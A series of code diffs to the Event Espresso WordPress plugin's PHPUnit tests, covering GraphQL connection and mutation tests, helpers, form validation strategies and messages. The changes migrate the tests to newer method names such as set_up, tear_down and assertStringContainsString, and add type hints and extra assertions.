+abstract class BaseQueriesTest extends GraphQLUnitTestCase
 {
-
     /**
      * @var EEM_Base $model
      */
@@ -19,6 +21,16 @@ class BaseQueriesTest extends GraphQLUnitTestCase
     public $admin;
     public $subscriber;
 
+    /**
+     * @var   AppContext
+     */
+    protected $app_context;
+
+
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
     public function set_up()
     {
         parent::set_up();
@@ -43,16 +55,17 @@ class BaseQueriesTest extends GraphQLUnitTestCase
         $this->app_context = new AppContext();
     }
 
+
     /**
      * Creates several entities for use in cursor query tests
      *
-     * @param  int $count Number of entities to create.
-     *
+     * @param int $count Number of entities to create.
      * @return array
+     * @throws EE_Error
+     * @throws ReflectionException
      */
-    public function create_entities($count = 20)
+    public function create_entities(int $count = 20): array
     {
-
         // Create entities
         $created_entities = [];
         for ($i = 1; $i <= $count; $i ++) {

--- a/tests/testcases/core/domain/services/graphql/connections/DatetimeConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/DatetimeConnectionQueriesTest.php
@@ -11,10 +11,10 @@ use GraphQLRelay\Connection\ArrayConnection;
  */
 class DatetimeConnectionQueriesTest extends BaseQueriesTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Datetime';
-        parent::setUp();
+        parent::set_up();
 
         $this->model = EEM_Datetime::instance();
     }

--- a/tests/testcases/core/domain/services/graphql/connections/EventConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/EventConnectionQueriesTest.php
@@ -3,6 +3,7 @@
 namespace EventEspresso\tests\testcases\core\domain\services\graphql\connections;
 
 use EEM_Event;
+use GraphQLRelay\Connection\ArrayConnection;
 
 /**
  * @group wpGraphQL
@@ -182,7 +183,16 @@ class EventConnectionQueriesTest extends BaseQueriesTest
 
         $first_event     = reset($events);
         $first_event_id  = $first_event->ID();
-        $expected_cursor = \GraphQLRelay\Connection\ArrayConnection::offsetToCursor($first_event_id);
+        $expected_cursor = ArrayConnection::offsetToCursor($first_event_id);
+        $this->assertArrayHasKey('data', $results);
+        $this->assertIsArray($results['data']);
+        $this->assertArrayHasKey('espressoEvents', $results['data']);
+        $this->assertIsArray(
+            $results['data']['espressoEvents'],
+            "Query result \$results['data']['espressoEvents'] is not an array. \$results: " . print_r($results, true)
+        );
+        $this->assertArrayHasKey('edges', $results['data']['espressoEvents']);
+        $this->assertIsArray($results['data']['espressoEvents']['edges']);
         $this->assertCount(1, $results['data']['espressoEvents']['edges']);
 
         $first_edge = $results['data']['espressoEvents']['edges'][0];

--- a/tests/testcases/core/domain/services/graphql/connections/EventConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/EventConnectionQueriesTest.php
@@ -14,10 +14,10 @@ class EventConnectionQueriesTest extends BaseQueriesTest
     public $current_date_gmt;
     public $created_event_ids;
 
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Event';
-        parent::setUp();
+        parent::set_up();
 
         $this->model = EEM_Event::instance();
 

--- a/tests/testcases/core/domain/services/graphql/connections/PriceConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/PriceConnectionQueriesTest.php
@@ -12,11 +12,11 @@ use GraphQLRelay\Relay;
  */
 class PriceConnectionQueriesTest extends BaseQueriesTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Price';
         $this->model = EEM_Price::instance();
-        parent::setUp();
+        parent::set_up();
     }
 
     public function pricesQuery($variables)

--- a/tests/testcases/core/domain/services/graphql/connections/PriceTypeConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/PriceTypeConnectionQueriesTest.php
@@ -9,11 +9,11 @@ use EEM_Price_Type;
  */
 class PriceTypeConnectionQueriesTest extends BaseQueriesTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Price_Type';
         $this->skip_create_entities = true;
-        parent::setUp();
+        parent::set_up();
 
         $this->model = EEM_Price_Type::instance();
     }

--- a/tests/testcases/core/domain/services/graphql/connections/TicketConnectionQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/TicketConnectionQueriesTest.php
@@ -9,10 +9,10 @@ use EEM_Ticket;
  */
 class TicketConnectionQueriesTest extends BaseQueriesTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Ticket';
-        parent::setUp();
+        parent::set_up();
 
         $this->model = EEM_Ticket::instance();
     }

--- a/tests/testcases/core/domain/services/graphql/mutators/BaseMutationTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/BaseMutationTest.php
@@ -15,9 +15,9 @@ class BaseMutationTest extends GraphQLUnitTestCase
     public $entity;
     public $model_name;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         if (!$this->model_name) {
             return;
         }

--- a/tests/testcases/core/domain/services/graphql/mutators/DatetimeCreateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/DatetimeCreateTest.php
@@ -7,11 +7,11 @@ namespace EventEspresso\tests\testcases\core\domain\services\graphql\mutators;
  */
 class DatetimeCreateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Datetime';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/DatetimeDeleteTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/DatetimeDeleteTest.php
@@ -16,11 +16,11 @@ use ReflectionException;
  */
 class DatetimeDeleteTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Datetime';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
 

--- a/tests/testcases/core/domain/services/graphql/mutators/DatetimeUpdateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/DatetimeUpdateTest.php
@@ -9,11 +9,11 @@ use GraphQLRelay\Relay;
  */
 class DatetimeUpdateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Datetime';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/PriceCreateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/PriceCreateTest.php
@@ -10,11 +10,11 @@ use EEM_Price_Type;
  */
 class PriceCreateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Price';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/PriceDeleteTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/PriceDeleteTest.php
@@ -9,11 +9,11 @@ use GraphQLRelay\Relay;
  */
 class PriceDeleteTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Price';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/PriceUpdateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/PriceUpdateTest.php
@@ -9,11 +9,11 @@ use GraphQLRelay\Relay;
  */
 class PriceUpdateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Price';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/TicketCreateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/TicketCreateTest.php
@@ -7,11 +7,11 @@ namespace EventEspresso\tests\testcases\core\domain\services\graphql\mutators;
  */
 class TicketCreateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Ticket';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/TicketDeleteTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/TicketDeleteTest.php
@@ -9,11 +9,11 @@ use GraphQLRelay\Relay;
  */
 class TicketDeleteTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Ticket';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/services/graphql/mutators/TicketUpdateTest.php
+++ b/tests/testcases/core/domain/services/graphql/mutators/TicketUpdateTest.php
@@ -9,11 +9,11 @@ use GraphQLRelay\Relay;
  */
 class TicketUpdateTest extends BaseMutationTest
 {
-    public function setUp()
+    public function set_up()
     {
         $this->model_name = 'Ticket';
         // before
-        parent::setUp();
+        parent::set_up();
     }
 
     /**

--- a/tests/testcases/core/domain/values/assets/JavascriptAssetTest.php
+++ b/tests/testcases/core/domain/values/assets/JavascriptAssetTest.php
@@ -40,7 +40,7 @@ class JavascriptAssetTest extends EspressoPHPUnitFrameworkTestCase
      * @throws InvalidFilePathException
      * @throws InvalidArgumentException
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->domain_mock = new Domain(
             new FilePath(EVENT_ESPRESSO_MAIN_FILE),
@@ -50,7 +50,7 @@ class JavascriptAssetTest extends EspressoPHPUnitFrameworkTestCase
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         $this->domain_mock = null;
         $this->js_asset = null;

--- a/tests/testcases/core/helpers/EEH_Array_Test.php
+++ b/tests/testcases/core/helpers/EEH_Array_Test.php
@@ -21,16 +21,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  * @group helpersArray
  *
  */
-class EEH_Array_Test extends EE_UnitTestCase {
-
-	/**
-	 * 	setUpBeforeClass
-	 */
-	static function setUpBeforeClass() {
-	}
-
-
-
+class EEH_Array_Test extends EE_UnitTestCase
+{
 	/**
 	 *    test_insert_into_array_with_string_indexes
 	 */

--- a/tests/testcases/core/helpers/EEH_File_Test.php
+++ b/tests/testcases/core/helpers/EEH_File_Test.php
@@ -17,9 +17,9 @@ if (!defined('EVENT_ESPRESSO_VERSION')) {
  */
 class EEH_File_Test extends EE_UnitTestCase
 {
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         add_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
         add_filter('filesystem_method', array($this, 'filter_fs_method'));
         add_filter('FHEE__EEH_File___get_wp_filesystem__allow_using_filesystem_direct', '__return_false');
@@ -28,7 +28,7 @@ class EEH_File_Test extends EE_UnitTestCase
         $wp_filesystem->init('/');
     }
 
-    public function tearDown()
+    public function tear_down()
     {
         remove_action('wp_footer', array('EE_Error', 'enqueue_error_scripts'), 1);
         // restore to using the normal WP filesystem
@@ -36,7 +36,7 @@ class EEH_File_Test extends EE_UnitTestCase
         remove_filter('filesystem_method_file', array($this, 'filter_abstraction_file'));
         remove_filter('filesystem_method', array($this, 'filter_fs_method'));
 
-        parent::tearDown();
+        parent::tear_down();
     }
 
     public function filter_fs_method($method)

--- a/tests/testcases/core/helpers/EEH_Line_Item_Test.php
+++ b/tests/testcases/core/helpers/EEH_Line_Item_Test.php
@@ -13,11 +13,8 @@ if (!defined('EVENT_ESPRESSO_VERSION')) {
  * @author				Mike Nelson
  * @group                 line-item-calculator
  */
-class EEH_Line_Item_Test extends EE_UnitTestCase{
-
-	static function setUpBeforeClass() {
-	}
-
+class EEH_Line_Item_Test extends EE_UnitTestCase
+{
 	public function test_get_items_subtotal(){
 		$transaction = $this->new_typical_transaction();
 		$items_subtotals = EEM_Line_Item::instance()->get_all_of_type_for_transaction( EEM_Line_Item::type_sub_total, $transaction );

--- a/tests/testcases/core/helpers/EEH_MSG_Template_Test.php
+++ b/tests/testcases/core/helpers/EEH_MSG_Template_Test.php
@@ -26,15 +26,15 @@ class EEH_MSG_Template_Test extends EE_UnitTestCase {
 
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->_message_resource_manager = EE_Registry::instance()->load_lib( 'Message_Resource_Manager' );
 		$this->assertInstanceOf( 'EE_Message_Resource_Manager', $this->_message_resource_manager );
 	}
 
 
-	public function tearDown() {
-		parent::tearDown();
+	public function tear_down() {
+		parent::tear_down();
 		$this->_message_resource_manager = null;
 	}
 

--- a/tests/testcases/core/helpers/EEH_Parse_Shortcodes_Test.php
+++ b/tests/testcases/core/helpers/EEH_Parse_Shortcodes_Test.php
@@ -59,9 +59,9 @@ class EEH_Parse_Shortcodes_Test extends EE_UnitTestCase
     protected $_parse_shortcodes_helper_mock;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
 
         //all shortcode parse tests will require a full event to be setup with some datetimes and tickets.
         $price         = $this->factory->price_chained->create_object(array(

--- a/tests/testcases/core/helpers/EEH_Parse_Shortcodes_Test.php
+++ b/tests/testcases/core/helpers/EEH_Parse_Shortcodes_Test.php
@@ -273,8 +273,7 @@ class EEH_Parse_Shortcodes_Test extends EE_UnitTestCase
      *
      * @group 7585
      * @throws EE_Error
-     * @throws EE_Error
-     * @throws EE_Error
+     * @throws ReflectionException
      * @since 4.6
      */
     public function test_parsing_email_payment_received()
@@ -284,39 +283,42 @@ class EEH_Parse_Shortcodes_Test extends EE_UnitTestCase
         //now that we have parsed let's test the results, note for the purpose of this test we are verifying transaction shortcodes and ticket shortcodes.
 
         //testing [PRIMARY_REGISTRANT_FNAME], [PRIMARY_REGISTRANT_LNAME]
-        $this->assertContains('Luke Skywalker', $parsed);
+        $this->assertStringContainsString('Luke Skywalker', $parsed);
 
         //testing [PAYMENT_STATUS]
-        $this->assertContains('Incomplete', $parsed);
+        $this->assertStringContainsString('Incomplete', $parsed);
 
         //testing [TXN_ID]
-        $this->assertContains('999999', $parsed);
+        $this->assertStringContainsString('999999', $parsed);
 
         //testing [TOTAL_COST] and [AMOUNT_DUE]  (should be $125*3 + 20 shipping charge + taxes)
         $total_cost = EEH_Template::format_currency('398.00');
-        $this->assertContains($total_cost, $parsed);
+        $this->assertStringContainsString($total_cost, $parsed);
         //but we should also have a count of TWO for this string
         $this->assertEquals(2, substr_count($parsed, $total_cost));
 
         //testing [AMOUNT_PAID]
         $amount_paid = EEH_Template::format_currency('0');
-        $this->assertContains($amount_paid, $parsed);
+        $this->assertStringContainsString($amount_paid, $parsed);
 
 
         //testing [TICKET_NAME]
-        $this->assertContains('Podracing Entry', $parsed);
+        $this->assertStringContainsString('Podracing Entry', $parsed);
 
         //testing [TICKET_DESCRIPTION]
-        $this->assertContains('One entry in the event.', $parsed);
+        $this->assertStringContainsString('One entry in the event.', $parsed);
 
         //testing [TICKET_PRICE]
-        $this->assertContains(EEH_Template::format_currency('125.00'), $parsed);
+        $this->assertStringContainsString(EEH_Template::format_currency('125.00'), $parsed);
 
 
         //testing [TKT_QTY_PURCHASED]
         $expected = '<strong>Quantity Purchased:</strong> 3';
-        $this->assertContains($expected, $parsed,
-            '[TKT_QTY_PURCHASED] shortcode was not parsed correctly to the expected value which is 3');
+        $this->assertStringContainsString(
+            $expected,
+            $parsed,
+            '[TKT_QTY_PURCHASED] shortcode was not parsed correctly to the expected value which is 3'
+        );
 
     }
 
@@ -337,7 +339,7 @@ class EEH_Parse_Shortcodes_Test extends EE_UnitTestCase
         $parsed = $this->_get_parsed_content('html', 'receipt', 'content', 'purchaser');
 
         //testing [PAYMENT_GATEWAY]
-        $this->assertContains('Invoice', $parsed);
+        $this->assertStringContainsString('Invoice', $parsed);
     }
 
 

--- a/tests/testcases/core/libraries/batch/JobHandlers/DatetimeOffsetFixTest.php
+++ b/tests/testcases/core/libraries/batch/JobHandlers/DatetimeOffsetFixTest.php
@@ -20,9 +20,9 @@ class DatetimeOffsetFixTest extends EE_UnitTestCase
     protected $datetime_offset_fix_mock;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->datetime_offset_fix_mock = new DatetimeOffsetFixMock();
     }
 

--- a/tests/testcases/core/libraries/form_sections/base/EE_Form_Section_Base__find_section_from_path_Test.php
+++ b/tests/testcases/core/libraries/form_sections/base/EE_Form_Section_Base__find_section_from_path_Test.php
@@ -27,8 +27,8 @@ class EE_Form_Section_Base__find_section_from_path_Test extends EE_UnitTestCase{
 	protected $_aunt_section;
 	protected $_cousin_section;
 	
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->_child_section = new EE_Text_Input();
 		$this->_sibling_section = new EE_Text_Input();
 		$this->_parent_section = new EE_Form_Section_Proper( 

--- a/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Float_Normalization_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Float_Normalization_Test.php
@@ -89,11 +89,11 @@ class EE_Float_Normalization_Test extends EE_UnitTestCase{
     /**
      * @group        10586
      * @dataProvider bad_float_inputs
-     * @expectedException EE_Validation_Error
      * @param $input
      * @throws EE_Validation_Error
      */
 	public function test_bad_float_inputs($input){
+        $this->setExceptionExpected(EE_Validation_Error::class);
         $this->_strategy->normalize( $input );
 	}
 }

--- a/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Float_Normalization_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Float_Normalization_Test.php
@@ -21,8 +21,9 @@ class EE_Float_Normalization_Test extends EE_UnitTestCase{
     protected $_strategy;
 
 
-    public function setUp(){
-        parent::setUp();
+    public function set_up()
+{
+        parent::set_up();
         $this->_strategy = new EE_Float_Normalization();
         $input = new EE_Text_Input();
         $this->_strategy->_construct_finalize( $input );

--- a/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Int_Normalization_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Int_Normalization_Test.php
@@ -92,11 +92,11 @@ class EE_Int_Normalization_Test extends EE_UnitTestCase{
     /**
      * @group        10586
      * @dataProvider bad_int_inputs
-     * @expectedException EE_Validation_Error
      * @param $input
      * @throws EE_Validation_Error
      */
     public function test_bad_float_inputs($input){
+        $this->setExceptionExpected('EE_Validation_Error');
         $this->_strategy->normalize( $input );
     }
 }

--- a/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Int_Normalization_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/normalization/EE_Int_Normalization_Test.php
@@ -21,8 +21,9 @@ class EE_Int_Normalization_Test extends EE_UnitTestCase{
     protected $_strategy;
 
 
-    public function setUp(){
-        parent::setUp();
+    public function set_up()
+{
+        parent::set_up();
         $this->_strategy = new EE_Int_Normalization();
         $input = new EE_Text_Input();
         $this->_strategy->_construct_finalize( $input );

--- a/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Email_Validation_Strategy_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Email_Validation_Strategy_Test.php
@@ -21,8 +21,8 @@ class EE_Email_Validation_Strategy_Test extends EE_UnitTestCase{
 	protected $_validator = null;
 
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->_validator = new EE_Email_Validation_Strategy();
 		//finalize its construction, but we don't actually need the input anyways
 		$this->_validator->_construct_finalize( new EE_Email_Input() );

--- a/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Max_Length_Validation_Strategy_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Max_Length_Validation_Strategy_Test.php
@@ -18,8 +18,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
 class EE_Max_Length_Validation_Strategy_Test extends EE_UnitTestCase{
 
 	protected $_validator = null;
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->_validator = new EE_Max_Length_Validation_Strategy( 'oups', 5 );
 		$input = new EE_Text_Input();
 		//finalize its construction, but we don't actually need the input anyways

--- a/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Min_Length_Validation_Strategy_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Min_Length_Validation_Strategy_Test.php
@@ -18,8 +18,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
 class EE_Min_Length_Validation_Strategy_Test extends EE_UnitTestCase{
 
 	protected $_validator = null;
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->_validator = new EE_Min_Length_Validation_Strategy( 'oups', 5 );
 		$input = new EE_Text_Input();
 		//finalize its construction, but we don't actually need the input anyways

--- a/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Plaintext_Validation_Strategy_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Plaintext_Validation_Strategy_Test.php
@@ -19,8 +19,9 @@ class EE_Plaintext_Validation_Strategy_Test extends EE_UnitTestCase{
 	 * @var EE_Validation_Strategy_Base
 	 */
 	protected $_validator = null;
-	public function setUp(){
-		parent::setUp();
+	public function set_up()
+    {
+		parent::set_up();
 		$this->_validator = new EE_Plaintext_Validation_Strategy();
 		$input = new EE_Text_Input();
 		//finalize its construction, but we don't actually need the input anyways

--- a/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Text_Length_Validation_Strategy_Test.php
+++ b/tests/testcases/core/libraries/form_sections/strategies/validation/EE_Text_Length_Validation_Strategy_Test.php
@@ -18,8 +18,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
 class EE_Text_Validation_Strategy_Test extends EE_UnitTestCase{
 
 	protected $_validator = null;
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		$this->_validator = new EE_Text_Validation_Strategy( 'oups', '~Darth ([\w]*)~' );
 		$input = new EE_Text_Input();
 		//finalize its construction, but we don't actually need the input anyways

--- a/tests/testcases/core/libraries/line_item_filters/EE_Line_Item_Filter_Processor_Test.php
+++ b/tests/testcases/core/libraries/line_item_filters/EE_Line_Item_Filter_Processor_Test.php
@@ -13,8 +13,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  * @group                Line_Item_Filter
  */
 class EE_Line_Item_Filter_Processor_Test extends EE_UnitTestCase{
-	function setUp(){
-		parent::setUp();
+	function set_up(){
+		parent::set_up();
 		EEH_Autoloader::register_line_item_filter_autoloaders();
 	}
 	/**

--- a/tests/testcases/core/libraries/line_item_filters/EE_Non_Zero_Line_Item_Filter_Test.php
+++ b/tests/testcases/core/libraries/line_item_filters/EE_Non_Zero_Line_Item_Filter_Test.php
@@ -13,8 +13,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  * @group                Line_Item_Filter
  */
 class EE_Non_Zero_Line_Item_Filter_Test extends EE_UnitTestCase{
-	function setUp(){
-		parent::setUp();
+	function set_up(){
+		parent::set_up();
 		EEH_Autoloader::register_line_item_filter_autoloaders();
 	}
 

--- a/tests/testcases/core/libraries/line_item_filters/EE_Specific_Registrations_Line_Item_Filter_Test.php
+++ b/tests/testcases/core/libraries/line_item_filters/EE_Specific_Registrations_Line_Item_Filter_Test.php
@@ -14,8 +14,8 @@ if ( !defined( 'EVENT_ESPRESSO_VERSION' ) ) {
  * @group                line-item-calculator
  */
 class EE_Specific_Registrations_Line_Item_Filter_Test extends EE_UnitTestCase{
-	function setUp(){
-		parent::setUp();
+	function set_up(){
+		parent::set_up();
 		EEH_Autoloader::register_line_item_filter_autoloaders();
 	}
 	function test_process__1_taxless_ticket() {

--- a/tests/testcases/core/libraries/messages/EE_Message_Resource_Manager_Test.php
+++ b/tests/testcases/core/libraries/messages/EE_Message_Resource_Manager_Test.php
@@ -18,8 +18,8 @@ class EE_Message_Resource_Manager_Test extends EE_UnitTestCase {
 
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->_message_resource_manager = EE_Registry::instance()->load_lib( 'Message_Resource_Manager' );
 		$this->assertInstanceOf( 'EE_Message_Resource_Manager', $this->_message_resource_manager );
 		//make sure message type and messenger that might be persisting inactive between tests are fixed.
@@ -27,9 +27,9 @@ class EE_Message_Resource_Manager_Test extends EE_UnitTestCase {
 	}
 
 
-	public function tearDown() {
+	public function tear_down() {
 		$this->_message_resource_manager = null;
-		parent::tearDown();
+		parent::tear_down();
 	}
 
 

--- a/tests/testcases/core/libraries/messages/EE_Messages_Processor_Test.php
+++ b/tests/testcases/core/libraries/messages/EE_Messages_Processor_Test.php
@@ -19,9 +19,9 @@ class EE_Messages_Processor_Test extends EE_UnitTestCase
 {
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->loadTestScenarios();
         //setup events etc for previewer to use
         $this->scenarios->get_scenarios_by_type('event');

--- a/tests/testcases/core/libraries/messages/EE_Messages_Processor_Test.php
+++ b/tests/testcases/core/libraries/messages/EE_Messages_Processor_Test.php
@@ -283,9 +283,9 @@ class EE_Messages_Processor_Test extends EE_UnitTestCase
         /** @type EE_Message $msg */
         $msg = $generated_queue->get_message_repository()->current();
         $this->assertInstanceOf('EE_Message', $msg);
-        $this->assertContains('Registration Notification', $msg->content());
-        $this->assertContains('Luke Skywalker', $msg->content());
-        $this->assertContains('Test Scenario EVT A', $msg->content());
+        $this->assertStringContainsString('Registration Notification', $msg->content());
+        $this->assertStringContainsString('Luke Skywalker', $msg->content());
+        $this->assertStringContainsString('Test Scenario EVT A', $msg->content());
 
         //messages in queue should be saved - this is because the cc field for email messages is extra meta and when
         //that's added it saves the object to get an ID for the extra meta relation.

--- a/tests/testcases/core/libraries/messages/EE_Messages_Validator_Test.php
+++ b/tests/testcases/core/libraries/messages/EE_Messages_Validator_Test.php
@@ -21,8 +21,8 @@ class EE_Messages_Validator_Test extends EE_UnitTestCase {
 	private $_messagesValidatorMock;
 
 
-	public function setUp() {
-		parent::setUp();
+	public function set_up() {
+		parent::set_up();
 		$this->loadMessagesMocks();
 		$this->_messagesValidatorMock = new EE_Messages_Validator_Mock();
 	}

--- a/tests/testcases/core/libraries/messages/EE_Messages_Validator_Test.php
+++ b/tests/testcases/core/libraries/messages/EE_Messages_Validator_Test.php
@@ -58,9 +58,21 @@ class EE_Messages_Validator_Test extends EE_UnitTestCase {
 		$this->assertFalse( $this->_messagesValidatorMock->invalid_shortcodes( $string_with_valid_shortcodes, $valid_shortcodes_array ) );
 
 		//test invalid shortcodes
-		$this->assertContains( '[JUST_AN_INVALID*_]', $this->_messagesValidatorMock->invalid_shortcodes( $string_with_invalid_shortcodes, $valid_shortcodes_array ) );
-		$this->assertContains( '[THIS_ONE_* (that does have a bracket)]', $this->_messagesValidatorMock->invalid_shortcodes( $string_with_invalid_shortcodes, $valid_shortcodes_array ) );
-		$this->assertContains( '[JUST_A_PLAIN_INVALID_SHORTCODE]', $this->_messagesValidatorMock->invalid_shortcodes( $string_with_invalid_shortcodes, $valid_shortcodes_array ) );
-		$this->assertContains( '[SOMEWHAT_INVALID', $this->_messagesValidatorMock->invalid_shortcodes( $string_with_invalid_shortcodes, $valid_shortcodes_array ) );
+        $this->assertStringContainsString(
+            '[JUST_AN_INVALID*_]',
+            $this->_messagesValidatorMock->invalid_shortcodes($string_with_invalid_shortcodes, $valid_shortcodes_array)
+        );
+        $this->assertStringContainsString(
+            '[THIS_ONE_* (that does have a bracket)]',
+            $this->_messagesValidatorMock->invalid_shortcodes($string_with_invalid_shortcodes, $valid_shortcodes_array)
+        );
+        $this->assertStringContainsString(
+            '[JUST_A_PLAIN_INVALID_SHORTCODE]',
+            $this->_messagesValidatorMock->invalid_shortcodes($string_with_invalid_shortcodes, $valid_shortcodes_array)
+        );
+        $this->assertStringContainsString(
+            '[SOMEWHAT_INVALID',
+            $this->_messagesValidatorMock->invalid_shortcodes($string_with_invalid_shortcodes, $valid_shortcodes_array)
+        );
 	}
 }

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Addon_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Addon_Test.php
@@ -52,9 +52,9 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         add_filter(
             'FHEE__EEH_Activation__create_table__short_circuit',
             array($this, 'dont_short_circuit_new_addon_table'),
@@ -340,7 +340,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
 
 
 
-    public function tearDown()
+    public function tear_down()
     {
         if (isset($this->_addon_name, EE_Registry::instance()->addons->EE_New_Addon)) {
             $main_file_path_before_deregistration = EE_Registry::instance()
@@ -366,7 +366,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
         $this->_stop_pretending_addon_hook_time();
         $this->_stop_pretending_after_plugin_activation();
         remove_all_filters('AHEE__EE_System__load_espresso_addons');
-        parent::tearDown();
+        parent::tear_down();
     }
 
     /**
@@ -381,7 +381,7 @@ class EE_Register_Addon_Test extends EE_UnitTestCase
     //		EE_New_Addon::register_addon();
     //		$this->assertAttributeNotEmpty('EE_New_Addon',EE_Registry::instance()->addons);
     //
-    //		//and then it should be torn down by tearDown()
+    //		//and then it should be torn down by tear_down()
     //	}
     protected function _stop_pretending_after_plugin_activation()
     {

--- a/tests/testcases/core/libraries/plugin_api/EE_Register_Addon_Test.php
+++ b/tests/testcases/core/libraries/plugin_api/EE_Register_Addon_Test.php
@@ -1,29 +1,25 @@
 <?php
-if (! defined('EVENT_ESPRESSO_VERSION')) {
-    exit('No direct script access allowed');
-}
+
 /**
  * EE_Register_Addon_Test
  *
- * @package 	Event Espresso
+ * @package       Event Espresso
  * @subpackage
- * @author 		Mike Nelson
+ * @author        Mike Nelson
  *
- * @group 		core/libraries/plugin_api
- * @group 		core
- * @group 		agg
- * @group 		addons
- * @group 		caps
+ * @group         core/libraries/plugin_api
+ * @group         core
+ * @group         agg
+ * @group         addons
+ * @group         caps
  */
 class EE_Register_Addon_Test extends EE_UnitTestCase
 {
-
     private $_mock_addon_path;
 
     private $_reg_args;
 
     private $_addon_name;
-
 
 
     /**
